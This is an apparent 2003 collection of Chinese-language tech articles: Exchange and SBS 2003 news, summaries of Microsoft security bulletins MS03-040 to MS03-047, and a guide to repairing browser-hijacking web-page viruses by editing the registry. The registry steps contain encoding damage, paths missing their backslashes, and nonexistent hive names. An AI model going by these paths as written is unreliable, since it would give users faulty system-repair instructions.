Exchange 2003提供Exchange 5.5的升級精靈,包含相當繁複的程序,相較於以往的升級精靈,Exchange 2003相當著重安全檢查,因此提供嚴謹的安全性檢測及確認步驟,如果出現錯誤訊息最好加以確認再繼續。若希望將作業一併升級至Windows Server 2003,應先升級Exchange 2003再升級作業系統。
由Exchange Server 2003新增的功能來看,微軟正積極整合伺服器及用戶端的功能,讓Exchange Server 2003作為訊息平臺,提供更好的連結性,串連企業的人員、系統及商業流程,達到更緊密的溝通。
TechEd 2003特別報導-新版中小企業伺服器組合SBS 2003
兩種版本區隔市場需求
距離2000年Comdex Fall發表Small Business Server 2000以來又過了三年,在微軟的.NET願景與新一代伺服器作業系統Windows Server 2003的推波助瀾之下,結合作業系統平臺和多種伺服器軟體,專為中小企業IT環境而推出的Small Business Server,自然也順勢將版本推升到2003。
2003與2000不同的地方當然就是順應Windows Server 2003的推出,將包裝中作業系統平臺和其他的伺服器軟體一併升級為2003版本,讓中小企業也能順應網際網路與分散式運算的潮流,享受微軟新技術的好處。
不過為了更進一步拓展Small Business Server的市場範圍,吸引小型辦公室與SOHO族的使用,此次2003版本還區分成標準版(Standard Edition)與尊榮版(Premium Edition)兩種版本。眼尖的的客戶應該也注意到了,標準版與尊榮版在所包含的伺服器軟體與價格上都有所不同,標準版少了ISA Server、SQL Server與Front Page。與2000比起來,2003尊榮版就像是2000直接升級,而標準版反倒像是瘦身過的陽春版本。
不過既然是瘦身版本,價格自然也會降低。根據外電與微軟美國網站的消息,尊榮版在北美地區的價格應該與2000版差不多,而標準版則低於尊榮版的一半以下。至於臺灣地區的價格,臺灣微軟還未正式公布,不過根據微軟經銷商在上周剛結束的TechEd 2003表示,尊榮版的價格也與2000差不多,而標準版則是「不可思議地低,與個別單獨購買作業系統加那些伺服器軟體比起來,絕對是物超所值。」
2003版還有另一個改變就是用戶端電腦最大連接數從2000版的50個增加到75個,顯然這是為了照顧中小企業IT環境擴張的需要。初始的用戶端授權數(Client Access License,CAL)雖然都還是5個,不過這次2003版要增加授權數目可以透過電話直接向微軟的服務中心取得授權,不必再像2000版一樣使用3.5吋的磁片。
而除了價格與版本上的區分之外,Small Business Server 2003當然也有功能方面的增進。首先就是安裝與設定的簡化,在TechEd 2003上,我們看到一個對於經銷商與客戶來說都頗為貼心的OEM preinstall功能。經銷商可以在出貨給客戶之前,先將AD目錄和網路等基礎服務安裝好,客戶在第一次開機時只需再依照畫面上的待辦事項清單(To Do list)建立使用者帳戶並設定用戶端電腦資訊,便能夠開始使用。而此次2003版的待辦事項清單也從之前的18個項目簡化到10個項目,基本的設定幾乎都能在15分鐘內完成。
在今年的TechEd 2003研討會上雖然因為場次的關係,沒辦法看到太多Small Business Server 2003的新特色,但可以預見在新版作業系統和其他伺服器軟體的加持及價格的誘因之下,Small Business Server 2003應該會吸引不少小型辦公室和SOHO族加入。Small Business Server 2003的RC版已經推出了幾個月,微軟的美國網站上也貼出了一個倒數計時器,預告發行的日期。在本文出刊時2003應該已經正式發行,屆時再讓我們仔細看看Small Business Server 2003有什麼好東西吧。
微軟10月份最新八大安全漏洞緊急公告
日期:2003-10-20
微軟最新發佈八大安全通告:MS03-040到MS03-047。這其中包括了五個Microsoft Windows系統相關的安全漏洞(MS03-041、MS03-042、MS03-043、MS03-044、MS03-045),和兩個Microsoft Exchange 伺服器相關的安全漏洞(MS03-046、MS03-047)。以及一個Internet Explorer累積補丁安全公告(MS03-040)。
其中MS03-043以及MS03-046所描述的安全漏洞可能允許未授權的攻擊者遠端直接入侵存在漏洞的Windows系統,需要立刻採取措施進行修復。
1、Authenticode驗證漏洞 可導致任意代碼執行
發佈日期:2003年10月15日
安全漏洞公告號:MS03-041
詳細描述:
Authenticode驗證漏洞,可導致遠端攻擊者利用這個漏洞在系統上執行任意代碼。
Authenticode驗證漏洞存在的原因是因?:Authenticode在技術上存在漏洞,在low memory 條件下,能夠允許一個ActiveX控制下載和安裝。
漏洞能夠導致:攻擊者把一惡意站點創建為瀏覽器默認站點,並誘惑使用者訪問這一站點。當用戶訪問這一站點時ActiveX能夠自動安裝並執行。同時會發送一個臨時的HTML格式郵件給使用者。如果用戶閱讀了該郵件,未經授權的ActiveX便會自動安裝並運行。
微軟官方網站:
http//www.microsoft.com/technet/treeview/default.aspurl=/technet/security/bulletin/MS03-041.asp
2、Troubleshooter ActiveX緩衝器溢出安全漏洞
發佈日期:2003年10月15日
安全漏洞公告號:MS03-042
詳細描述:
Microsoft Local Troubleshooter ActiveX 控制項是在Windows 2000平臺上默認安裝的元件。
這一漏洞存在的原因是:Microsoft Local Troubleshooter ActiveX 控制項存在安全漏洞,ActiveX 控制項(Tshoot.ocx)的緩衝區溢出漏洞能夠使攻擊者在用戶機子上執行惡意代碼。
由於ActiveX被默認是安全的腳本,攻擊者可以利用這個ActiveX的漏洞進行攻擊。發送HTNL格式的惡意郵件給用戶;創建惡意網站,誘使用戶訪問。當用戶訪問這一站點,攻擊者就可遠端在受攻擊系統上執行任意代碼並運行。該惡意代碼只能在用戶許可權範圍內執行。
微軟官方網站:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-042.asp
3、Messenger緩衝區溢出漏洞 導致任意代碼執行
發佈日期:2003年10月15日
安全漏洞公告號:MS03-043
詳細描述:
Microsoft Windows是微軟開發的視窗作業系統。
Microsoft Windows的消息佇列服務存在堆溢出問題,遠端攻擊者可以利用這個漏洞以系統許可權在目的機器上執行任意指令。
問題存在於消息佇列服務程式的search-by-name函數中,攻擊者提交超長字串給這個函數可造成堆溢出,精心構建提交資料可能以系統許可權在目的機器上執行任意指令。
微軟官方網站:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-043.asp
4、Windows 幫助與支援控制中心緩衝器溢出漏洞
發佈日期:2003年10月15日
安全漏洞公告號:MS03-044
詳細描述:
Windows 幫助和支援中心緩衝器溢出漏洞,是存在於微軟Windows XP 和Windows Server 2003系統上的幫助與支援功能中的一個安全漏洞。它的代碼也同樣能影響微軟其餘的作業系統。漏洞的起因是因?一個文件關聯的HCP協定包含了未受制止的緩衝器。
攻擊者能夠利用這一漏洞創建一個URL,當使用者點擊這一URL時攻擊者就能夠在本地執行攻擊者所選擇的代碼。
這個URL能夠創建一個環球網站點或者立即發送電子郵件給使用者,在局域網的電腦上閱讀或者建立文件。
微軟官方網站:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-044.asp
5、ListBox與ComboBox 控制緩衝器溢出安全漏洞
發佈日期:2003年10月15日
安全漏洞公告號:MS03-045
詳細描述:
ListBox和ComboBox緩衝器溢出漏洞,存在的原因是因?ListBox控制和ComboBox控制兩者使用同一個位於User32.dll文件?堛漫I叫功能,這其中包含了一個溢出緩衝器。
這個功能不能正確的驗證參數,並發送一個來自臨時攻擊的windows消息。windows消息內容:使用者正確的互動式過程路徑。(例如:鍵盤或滑鼠動作)和其他互動式的通話。因?目錄選項權使用者不能正確的驗證Windows資訊並進行發送。一個處理互動式的桌面程式能夠導致ListBox 控制和 ComboBox控制執行任意代碼。並導致攻擊者在Windows2000管理器中完全控制系統。
微軟官方網站:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-045.asp
6、Exchange伺服器安全漏洞可導致任意代碼執行
發佈日期:2003年10月15日
安全漏洞公告號:MS03-046
詳細描述:
Exchange伺服器5.5版本中因特網郵件伺服器中存在的一個安全漏洞,它能夠導致未經許可的攻擊者在Exchange伺服器中向SMTP埠發送特殊構造的擴展verb請求。這些能夠導致郵件伺服器自動關閉或者因?數量巨大的記憶體而導致伺服器停止回應。
在Exchange 2000 伺服器上存在的安全漏洞也同樣能夠導致和Exchange伺服器5.5版本中相類似攻擊發生。並且如果攻擊者發佈這些請求資料就能導致緩衝器溢出,並允許攻擊者運轉惡意程式,從而以SMTP服務運行身份執行任意代碼。
微軟官方網站:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-046.asp
7、Exchange伺服器5.5 Outlook Web Access漏洞
發佈日期:2003年10月15日
安全漏洞公告號:MS03-047
詳細描述:
一個交叉站點腳本[cross-site scripting (XSS)]漏洞由於Outlook Web Access (OWA) 路徑執行HTML編碼時而存在。如果使用者的原本被執行,攻擊者的代碼就能夠同時被執行,並訪問和設置OWA(Outlook Web Access) 環球站點和授權攻擊者訪問使用者存取站點的資料附件。
通過OWA一名攻擊者能夠發送含有特別的鏈結的資訊給使用者。使用者如果點擊這一鏈結,攻擊者能夠知道使用者Exchange伺服器的使用名。
微軟官方網站:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-047.asp
8、InternetExplorer累積補丁安全公告MS03-040
發佈日期:2003年10月6日
安全漏洞公告號:MS03-040
詳細描述:
我們在Microsoft Internet Explorer 中發現了一些安全性弱點,攻擊者可能會利用這些弱點侵入您的Microsoft Windows系統,進行各種破壞行動。舉例來說,當您使用電腦檢視攻擊者的網站時,攻擊者即可在您的電腦上執行某些程式。這項弱點會對安裝 Microsoft?Internet Explorer 的電腦造成影響。(即使您未使用 Internet Explorer 作?網頁瀏覽器,仍可能受到這項弱點的影響)。安裝這個Microsoft更新程式之後,將有助於保護您的電腦。
微軟官方網站:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-040.asp
惡意網頁病毒症狀及簡單修復方法
一、對IE瀏覽器產生破壞的網頁病毒:
(一).默認主頁被修改
1.破壞特性:默認主頁被自動改?某網站的網址。
2.表現形式:瀏覽器的默認主頁被自動設?如WWW.********.COM的網址。
3.清除方法:採用手動修改註冊表法,開始功能表->運行->regedit->確定,打開註冊表編輯工具,按順序依次打開:HKEY_LOCAL_USERSoftwareMicrosoftInternet ExplorerMain 分支,找到Default_Page_URL鍵值名(用來設置默認主頁),在右窗口點擊右鍵進行修改即可。按F5鍵刷新生效。
危害程度:一般
(二).默認首頁被修改
1.破壞特性:默認首頁被自動改?某網站的網址.
2.表現形式:瀏覽器的默認主頁被自動設?如WWW.********.COM的網址。
3.清除方法:採用手動修改註冊表法,開始功能表->運行->regedit->確定,打開註冊表編輯工具,按如下順序依次打開:HKEY_LOCAL_USERSoftwareMicrosoftInternet ExplorerMain分支,找到StartPage鍵值名(用來設置默認首頁),在右窗口點擊右鍵進行修改即可。按F5鍵刷新生效。
危害程度:一般
(三).默認的微軟主頁被修改
1.破壞特性:默認微軟主頁被自動改?某網站的網址.
2.表現形式:默認微軟主頁被篡改
3.清除方法:
(1)手動修改註冊表法:開始功能表->運行->regedit->確定,打開註冊表編輯工具,按如下順序依次打開:HKEY_LOCAL_MACHINESoftwareMicrosoftInternetExplorerMain 分支,找到Default_Page_URL鍵值名(用來設置默認微軟主頁),在右窗口點擊右鍵,將鍵值修改?http://www.microsoft.com/windows/ie_intl/cn/start/即可。按F5鍵刷新生效。
(2)自動文件導入註冊表法:請把以下內容輸入或粘貼複製到記事本內,以副檔名?reg的任意檔案名存在C盤的任一目錄下,然後執行此文件,根據提示,一路確認,即可顯示成功導入註冊表。
REGEDIT4
[HKEY_LOCAL_MACHINESoftwareMicrosoftInternet ExplorerMain]
"default_page_url"="http://www.microsoft.com/windows/ie_intl/cn/start/"
危害程度:一般
(四).主頁設置被遮罩鎖定,且設置選項無效不可更改
1.破壞特性:主頁設置被禁用
2.表現形式:主頁地址欄變灰色被遮罩
3.清除方法:
(1)手動修改註冊表法:開始功能表->運行->regedit->確定,打開註冊表編輯工具,按如下順序依次打開:HKEY_CURRENT_USERSoftwareMicrosoftInternetExplorer分支,新建“ControlPanel”主鍵,然後在此主鍵下新建鍵值名?“HomePage”的DWORD值,值?“00000000”,按F5鍵刷新生效。
(2)自動文件導入註冊表法:請把以下內容輸入或粘貼複製到記事本內,以副檔名?reg的任意檔案名存在C盤的任一目錄下,然後執行此文件,根據提示,一路確認,即可顯示成功導入註冊表。
REGEDIT4
[HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel]
"HomePage"=dword:00000000
危害程度:輕度
(五).默認的IE搜索引擎被修改
1.破壞特性:將IE的默認微軟搜索引擎更改。
2.表現形式:搜索引擎被篡改。
3.清除方法:
(1)手動修改註冊表法:開始功能表->運行->regedit->確定,打開註冊表編輯工具,第一,按如下順序依次打開:HKEY_LOCAL_MACHINESoftwareMicrosoftInternet ExplorerSearch分支,找到“SearchAssistant”鍵值名,在右面窗口點擊“修改”,即可對其鍵值進行輸入?:http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm,然後再找到“CustomizeSearch”鍵值名,將其鍵值修改?:http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm,按F5鍵刷新生效。
(2)自動文件導入註冊表法:請把以下內容輸入或粘貼複製到記事本內,以副檔名?reg的任意檔案名存在C盤的任一目錄下,然後執行此文件,根據提示,一路確認,即可顯示成功導入註冊表。
REGEDIT4
[HKEY_LOCAL_MACHINESoftwareMicrosoftInternetExplorerSearch]
"SearchAssistant"="http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm"
"CustomizeSearch"="http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm"
危害程度:一般
(六).IE標題欄被添加非法資訊
1.破壞特性:通過修改註冊表,使IE標題欄被強行添加宣傳網站的廣告資訊。
2.表現形式:在IE頂端藍色標題欄上多出了什?“正點網,即使正點網!http://www.zhengdian.com"尾巴。
3.清除方法:
(1)手動修改註冊表法:開始功能表->運行->regedit->確定,打開註冊表編輯工具,第一,按如下順序依次打開:HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain分支,找到“Window Title”鍵值名,輸入鍵值?Microsoft Internet Explorer,按F5刷新。第二,按如下順序依次打開:HKEY_CURRENT_MACHINESoftwareMicrosoftInternetExplorerMain分支,找到“Window Title”鍵值名,輸入鍵值?Microsoft Internet Explorer,按F5刷新生效。
(2)自動文件導入註冊表法:請把以下內容輸入或粘貼複製到記事本內,以副檔名?reg的任意檔案名存在C盤的任一目錄下,然後執行此文件,根據提示,一路確認,即可顯示成功導入註冊表。
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain]
"Window Title"="Microsoft Internet Explorer"
[HKEY_LOCAL_MACHINESoftwareMicrosoftInternet ExplorerMain]
"Window Title"="Microsoft Internet Explorer"
危害程度:一般
七).OE標題欄被添加非法資訊破壞特性:
破壞特性:通過修改註冊表,在微軟的集成電子郵件程式Microsoft Outlook頂端標題欄添加宣傳網站的廣告資訊。
表現形式:在頂端的Outlook Express藍色標題欄添加非法資訊
清除方法:
(1)手動修改註冊表法:開始功能表->運行->regedit->確定,打開註冊表編輯工具,按如下順序依次打開:HKEY_LOCAL_USERSoftwareMicrosoftOutlook Express分支,找到WindowTitle以及Store Root鍵值名,將其鍵值均設?空。按F5鍵刷新生效。
(2)自動文件導入註冊表法:請把以下內容輸入或粘貼複製到記事本內,以副檔名?reg的任意檔案名存在C盤的任一目錄下,然後執行此文件,根據提示,一路確認,即可顯示成功導入註冊表。
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftOutlook Express]
"WindowTitle"=""
"Store Root"=""
危害程度:一般
(八).滑鼠右鍵功能表被添加非法網站鏈結:
1.破壞特性:通過修改註冊表,在滑鼠右鍵彈出功能表?堻Q添加非法站點的鏈結。
2.表現形式:添加“網址之家”等諸如此類的鏈結資訊。
3.清除方法:(1)手動修改註冊表法:開始功能表->運行->regedit->確定,打開註冊表編輯工具,按如下順序依次打開:HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerMenuExt分支,在左邊視窗凡是屬於非法鏈結的主鍵一律刪除,按F5鍵刷新生效。
危害程度:一般
(九).滑鼠右鍵彈出功能表功能被禁用失常:
1.破壞特性:通過修改註冊表,滑鼠右鍵彈出功能表功能在IE瀏覽器中被完全禁止。
2.表現形式:在IE中點擊右鍵毫無反應。
3.清除方法:
(1)手動修改註冊表法:開始功能表->運行->regedit->確定,打開註冊表編輯工具,按如下順序依次打開:HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerRestrictions分支,找到“NoBrowserContextMenu”鍵值名,將其鍵值設?“00000000”,按F5鍵刷新生效。
(2)自動文件導入註冊表法:請把以下內容輸入或粘貼複製到記事本內,以副檔名?reg的任意檔案名存在C盤的任一目錄下,然後執行此文件,根據提示,一路確認,即可顯示成功導入註冊表。
REGEDIT4
[HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerRestrictions]
"NoBrowserContextMenu"=dword:00000000
危害程度:輕度
(十).IE收藏夾被強行添加非法網站的位址鏈結
破壞特性:通過修改註冊表,強行在IE收藏夾內自動添加非法網站的鏈結資訊
表現形式:躲藏在收藏夾下
清除方法:請用手動直接清除,用滑鼠右鍵移動至該非法網站資訊上,點擊右鍵彈出功能表,選擇刪除即可。
危害程度:一般
(十一).在IE工具欄非法添加按鈕
破壞特性:工具欄處添加非法按鈕
表現形式:有按鈕圖示
清除方法:直接點擊滑鼠右鍵彈出功能表,選擇“刪除”即可。
危害程度:一般
(十二).鎖定地址欄的下拉功能表及其添加文字資訊
破壞特性:通過修改註冊表,將位址欄的下拉功能表鎖定變?灰色。
表現形式:不僅使下拉功能表消失,而且在其上覆蓋非法文字資訊。
清除方法:
(1)手動修改註冊表法:開始功能表->運行->regedit->確定,打開註冊表編輯工具,按如下順序依次打開:HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerToolbar分支,在右邊視窗找到“LinksFolderName”鍵值名,將其鍵值設?“鏈結”,多餘的字元一律去掉,按F5鍵刷新生效。
危害程度:輕度
(十三).IE功能表“查看”下的“原始檔案”項被禁用;
破壞特性:通過修改註冊表,將IE功能表“查看”下的“原始檔案”項鎖定變?灰色。
表現形式:“原始檔案”項不可用
清除方法:
(1)手動修改註冊表法:開始功能表->運行->regedit->確定,打開註冊表編輯工具,第一,按如下順序依次打開:HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerRestrictions分支,找到"NoViewSource"鍵值名,將其鍵值設?“00000000”,按F5鍵刷新生效。按如下順序依次打開:HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftInternet ExplorerRestrictions分支,找到"NoViewSource"鍵值名,將其鍵值設?“00000000”,按F5鍵刷新生效。
(2)自動文件導入註冊表法:請把以下內容輸入或粘貼複製到記事本內,以副檔名reg的任意檔案名存在C盤的任一目錄下,然後執行此文件,根據提示,一路確認,即可顯示成功導入註冊表。
REGEDIT4
[HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerRestrictions]
"NoViewSource"=dword:00000000
[HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftInternet ExplorerRestrictions]
"NoViewSource"=dword:00000000
危害程度:輕度
微軟發佈七個安全漏洞用戶需儘速修補
微軟公司今天公佈七個系統安全漏洞,在目前市面上的微軟作業平台除了Win98不受影響之外,幾乎全部的NT作業系統(NT4/2000 /XP/2003),甚至ME都會受到影響,微軟提醒用戶一定要盡快修補,以免遭到病毒或是駭客攻擊。
微軟公司今天一口氣公佈七個系統安全漏洞,編號排序從MS03-041到MS03-047,其中MS03-041、MS03-042、MS03-044三個弱點影響Internet Explorer 6與Outlook/Outlook Express;MS03-046, MS03-046兩個弱點影響Exchange伺服器, 另外MS03-043及MS03-045弱點則分別影響Messenger服務與本地系統應用程式。中華龍網弱點知識庫召集人賴妍帆建議Windows用戶盡快修補漏洞,尤其是影響Internet Explorer與電子郵件的Outlook/Outlook Express安全弱點非常容易受到電腦病毒的攻擊,另外使用Exchange郵件伺服器的用戶則需儘速對這二個安全弱點進行修補,而Messenger 服務則建議停止使用,或以防火牆阻擋NetBIOS通訊埠(137-139)便可以有效的降低安全風險,免遭病毒或是駭客攻擊。